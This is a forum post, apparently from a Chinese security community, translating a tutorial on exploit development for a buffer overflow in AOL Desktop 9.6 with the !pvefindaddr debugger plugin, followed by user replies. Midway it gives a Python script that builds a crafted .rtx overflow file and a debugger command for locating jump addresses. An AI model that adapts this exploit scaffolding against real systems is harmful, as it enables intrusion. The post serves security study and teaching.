[翻译]使用!pvefindaddr 更容易的开发漏洞利用-外文翻译-看雪-安全社区|安全招聘|kanxue.com

[翻译]使用!pvefindaddr 更容易的开发漏洞利用

发表于: 2011-3-13 01:05 18770

[翻译]使用!pvefindaddr 更容易的开发漏洞利用

仙果

2011-3-13 01:05

18770

翻译题目：使用!pvefindaddr 更容易的开发漏洞利用
Exploit Writing Made Easier With !pvefindaddr
作者:仙果
版权提示：文章版权归作者所有，转载请注明出处，尊重作者劳动成果。
题记：看雪上好像没有专门介绍Immunity Debugger 的!pvefindaddr 功能的文章,之前还请教过泉哥，花了一周的空闲时间把文章翻译完，算是补充下。
最近在fuzzing相关的项目，但是苦于没有经验，进展非常缓慢，求Fuzzing的一些思路，谢谢咯。
在exploit-db的网站上看到这么一篇文章，使用!pvefindaddr开发exploit,之前使用过这个命令，确实非常有用，今天正好翻译下，共享给更多的朋友，在这里谢谢泉哥之前的帮助。
现在开始正题，由于英语水平的限制（四级没过），文中肯定有翻译不正确之处，欢迎指正，仙果感激不尽。
Exploit Writing Made Easier With !pvefindaddr
开始阅读之前有一些需要注意的地方，包括本文讲到的和未讲到的点。
1.本文是为了证明!pvefindaddr是有效的。
2.本文不会完成漏洞的最终利用，如果你需要利用代码，可以在http://www.exploit-db.com/exploits/16107/上下载到。
现在让我们开始吧。

软件列表：
Immunity Debugger：http://www.immunityinc.com/products-immdbg.shtml
!pvefindaddr： http://redmine.corelan.be:8800/projects/pvefindaddr
AOL Desktop v9.6： http://daol.aol.com/software/aoldesktop96/

必备知识：
理解缓冲区溢出是原理
漏洞利用技巧
一门程序开发语言（我选用python）

我听了很多人抱怨漏洞利用过程中必须要使用各种各样的软件，如果这些软件不是自动化的又要花费更多的时间来完成任务或者为了
绕过SAFESEH和ASLR,这就是需要!pvefindaddr出现的地方了。

!pvefindaddr是什么!?
简短洁说！!pvefindaddr 是由corelanc0d3r：https://twitter.com/#!/corelanc0d3r （需要翻墙）为Immunity Debugger 开发的一个Python命令接口（MS不怎么准确，译者注），其差不多可以做漏洞利用开发过程的所有事情。有一些帮助信息,
如何安装：
!pvefindaddr:http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install
例子:http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage

OK，让我们真正开始吧
安装AOL Destop 9.6(应当注意,如果程序无法在Immunity Debugger中正确运行，你必须按住CTRL+ALT+DEL弹出任务管理器-进程,结束掉AOL的相关进程，然后重新执行程序。)
(准备把AOL Desktop 9.6下载下来自己调试一番，找了半天也没有安装上去，就只翻译，不做本地调试了，也挺郁闷的：译者注)
我们来完成大概的利用（不会完成整个利用，查看文章开头），包含2个标准头，中间是我们的缓冲区数据，让我们来构造它吧：

****************************************
	#!/usr/bin/python
	# The First Header
	hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
	"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
	"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
	"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
	"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
	"\x68\x74\x74\x70\x3a\x2f\x2f")
	# The Second Header
	hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
	"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
	"\x48\x54\x4d\x4c\x3e\x0d\x0a")
	payload='\x90'* 6000
	exploit = hd1+payload+hd2
	try:
	file=open('exploit.rtx','w')
	file.write(exploit)
	file.close()
	print 'File created, time to PEW PEW!\n'
	except:
	print 'Something went wrong!\n'
	print 'Check if you have permisions to write in that folder, of if the folder exists!'
	****************************************

!pvefindaddr suggest

!pvefindaddr j -r ESI -n -o (这会花费一段时间，店小二，来坛烧酒些许花生)

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

图(1)EIP覆盖.jpg （135.45kb，584次下载）
图(2)pvefindaddr.jpg （119.82kb，582次下载）
图(3)35784734.jpg （137.88kb，585次下载）
图(4)findmsp.jpg （343.35kb，596次下载）
图(5)suggest.jpg （343.35kb，593次下载）
图(6)modules.jpg （354.94kb，606次下载）
图(7)compare1.jpg （16.38kb，573次下载）
图(8)compare.jpg （173.43kb，575次下载）
Exploit Writing Made Easier With !pvefindaddr.doc And PDF.rar （2.19MB，115次下载）
Exploit Writing Made Easier With !pvefindaddr_英文原版.pdf （198.61kb，64次下载）

收藏・13

免费・7

支持

最新回复 (22)
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼发错版块了，真不好意思，版主好心给换个地吧 2011-3-13 01:10 0
StudyRush 雪币： 678 活跃值： (101) 能力值： ( LV2，RANK：150 ) 在线值：发帖 11 回帖 518 粉丝 0 关注私信	StudyRush 3 3 楼在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610 2011-3-13 08:57 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 4 楼对这块也不懂学习一下 2011-3-13 09:15 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 5 楼 [QUOTE=StudyRush;935423]在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE] 把这个忘记了，谢谢共享哈 2011-3-13 15:34 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 6 楼 [QUOTE=StudyRush;935423]在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE] 该插件可使用updata参数自动更新 2011-3-13 22:00 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 7 楼个人感觉该插件在win7下兼容性更好，虚拟机XP下反而会出现问题，一些朋友也遇到过那些问题 2011-3-13 22:05 0
StudyRush 雪币： 678 活跃值： (101) 能力值： ( LV2，RANK：150 ) 在线值：发帖 11 回帖 518 粉丝 0 关注私信	StudyRush 3 8 楼虽然暂时在实践中使用这个插件，功能确实强大。 2011-3-13 22:34 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 9 楼我在WIN7下无法运行这个插件，虚拟机测试了中文也英文XP SP3 ，效果还可以 2011-3-13 22:35 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 10 楼这个插件跟ImDebug版本有关 2011-3-14 09:04 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 11 楼那下次的时候我试下最新版在win7下如何，上次是1.7的版本 2011-3-14 09:37 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼我用的是旧版的，忘记版本号了，就是之前给你的版本 2011-3-14 10:19 0
spide 雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 36 粉丝 0 关注私信	spide 13 楼好文章！必须支持 2011-3-14 11:42 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 14 楼那个版本是1.7的版本，win7下不行话说为什么没人汉化这个呢？ 2011-3-14 11:45 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 15 楼不是没有，是你没找到，呵呵… 2011-3-14 13:30 0
youstar 雪币： 267 活跃值： (24) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 284 粉丝 0 关注私信	youstar 2 16 楼这个插件用过还是不错的，的确可以加快开发速度， 2011-3-14 14:55 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 17 楼汗，接着用英文版吧。。。。 2011-3-14 15:01 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 18 楼时间就是金钱， 2011-3-14 15:02 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 19 楼我在win7下用的1.5版本的 2011-3-17 21:12 0
yingyue 雪币： 1844 活跃值： (35) 能力值： ( LV3，RANK：30 ) 在线值：发帖 16 回帖 2595 粉丝 3 关注私信	yingyue 20 楼上传一份吧，谢 2011-3-17 22:00 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 21 楼文件比较大，不方便上传，你百度下就有了，之前我是直接用绿色兵团工具包里的IMDBG的，呵呵…… 2011-3-18 09:23 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 22 楼辛苦了，感谢仙果的付出！ 2011-3-24 21:02 0
akenny 雪币： 204 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	akenny 23 楼非常感谢鸟，最近正在研究，搞得发毛，lz真是帮大忙了 2011-8-31 01:01 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (22)
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼发错版块了，真不好意思，版主好心给换个地吧 2011-3-13 01:10 0
StudyRush 雪币： 678 活跃值： (101) 能力值： ( LV2，RANK：150 ) 在线值：发帖 11 回帖 518 粉丝 0 关注私信	StudyRush 3 3 楼在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610 2011-3-13 08:57 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 4 楼对这块也不懂学习一下 2011-3-13 09:15 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 5 楼 [QUOTE=StudyRush;935423]在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE] 把这个忘记了，谢谢共享哈 2011-3-13 15:34 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 6 楼 [QUOTE=StudyRush;935423]在这里我上传了两份，1.73和1.8的pvefindaddr插件。http://bbs.pediy.com/showthread.php?t=129610[/QUOTE] 该插件可使用updata参数自动更新 2011-3-13 22:00 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 7 楼个人感觉该插件在win7下兼容性更好，虚拟机XP下反而会出现问题，一些朋友也遇到过那些问题 2011-3-13 22:05 0
StudyRush 雪币： 678 活跃值： (101) 能力值： ( LV2，RANK：150 ) 在线值：发帖 11 回帖 518 粉丝 0 关注私信	StudyRush 3 8 楼虽然暂时在实践中使用这个插件，功能确实强大。 2011-3-13 22:34 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 9 楼我在WIN7下无法运行这个插件，虚拟机测试了中文也英文XP SP3 ，效果还可以 2011-3-13 22:35 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 10 楼这个插件跟ImDebug版本有关 2011-3-14 09:04 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 11 楼那下次的时候我试下最新版在win7下如何，上次是1.7的版本 2011-3-14 09:37 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼我用的是旧版的，忘记版本号了，就是之前给你的版本 2011-3-14 10:19 0
spide 雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 36 粉丝 0 关注私信	spide 13 楼好文章！必须支持 2011-3-14 11:42 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 14 楼那个版本是1.7的版本，win7下不行话说为什么没人汉化这个呢？ 2011-3-14 11:45 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 15 楼不是没有，是你没找到，呵呵… 2011-3-14 13:30 0
youstar 雪币： 267 活跃值： (24) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 284 粉丝 0 关注私信	youstar 2 16 楼这个插件用过还是不错的，的确可以加快开发速度， 2011-3-14 14:55 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 17 楼汗，接着用英文版吧。。。。 2011-3-14 15:01 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 18 楼时间就是金钱， 2011-3-14 15:02 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 19 楼我在win7下用的1.5版本的 2011-3-17 21:12 0
yingyue 雪币： 1844 活跃值： (35) 能力值： ( LV3，RANK：30 ) 在线值：发帖 16 回帖 2595 粉丝 3 关注私信	yingyue 20 楼上传一份吧，谢 2011-3-17 22:00 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 21 楼文件比较大，不方便上传，你百度下就有了，之前我是直接用绿色兵团工具包里的IMDBG的，呵呵…… 2011-3-18 09:23 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 22 楼辛苦了，感谢仙果的付出！ 2011-3-24 21:02 0
akenny 雪币： 204 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	akenny 23 楼非常感谢鸟，最近正在研究，搞得发毛，lz真是帮大忙了 2011-8-31 01:01 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复